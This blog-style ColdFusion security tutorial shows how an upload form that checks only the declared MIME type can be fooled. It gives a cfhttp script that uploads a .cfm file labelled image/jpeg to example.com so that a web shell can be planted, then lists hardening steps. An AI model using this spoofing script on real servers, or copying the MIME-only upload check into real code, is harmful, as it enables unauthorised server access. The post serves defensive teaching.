Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can easily spoof the MIME type of any file and get it uploaded to another server, allowing any number of code exploits.
First, we’re going to write a quick file upload script:
<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'> <cfinput type='file' name='FileUpload' required='yes' message='Select a file to upload.' /><br /> <cfinput type='submit' value='Upload File' name='submit' /> </cfform>
Notice this goes to an action page called uploadact.cfm which only accepts jpegs and gifs, this form actually handles the upload as follows:
<cfif isDefined('fileUpload')> <cffile action='upload' fileField='fileUpload' destination='C:path to upload' accept='image/jpeg,image/gif' nameconflict='makeunique'> <p>Thankyou, your file has been uploaded.</p> <p><a href='/'>Return Home</a></p> </cfif>
Now for the fun part, we’re going to write a page using cfhttp that would run on the attackers server/workstation that allows for files local to them to be uploaded by faking the MIME type with cfhttpparam:
<cfhttp url='http://example.com/uploadact.cfm' method='post'> <cfhttpparam type='formfield' value='Upload File' name='submit'> <cfhttpparam type='file' name='FileUpload' file='C:PathTo est.cfm' mimetype='image/jpeg'> </cfhttp>
Now with this we could upload an ASP or ColdFusion based web shell that would essentially give us unlimited access to a server.Â So follow the following tips:
- If you have an Enterprise license, use Sandbox Security.Â This will limit each site to its own set of directories and data sources.
- Disable cfexecute and cfregistry.Â If you can use Sandboxes, do this for each Sandbox, or setup a global Sandbox on your main site’s directory.Â Remember with Sandboxes, if you absolutly need cfexecute, remember that you can setup a Sandbox for a single folder with access to it and put processing files in here (say to use FFMPEG for videos conversion).
- Disable JSP (Adobe Instructions) if you don’t actually use it.Â Since the default for ColdFusion is to run as System on Windows, any JSP file that makes its way to the server will have full access, and JSP’s don’t follow Sandboxes, so even if they are setup they are of no use.
- Run ColdFusion as another user (Adobe Instructions).Â Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded
- Always perform multiple checks on your file uploads (Pete Freitag has a good article on this)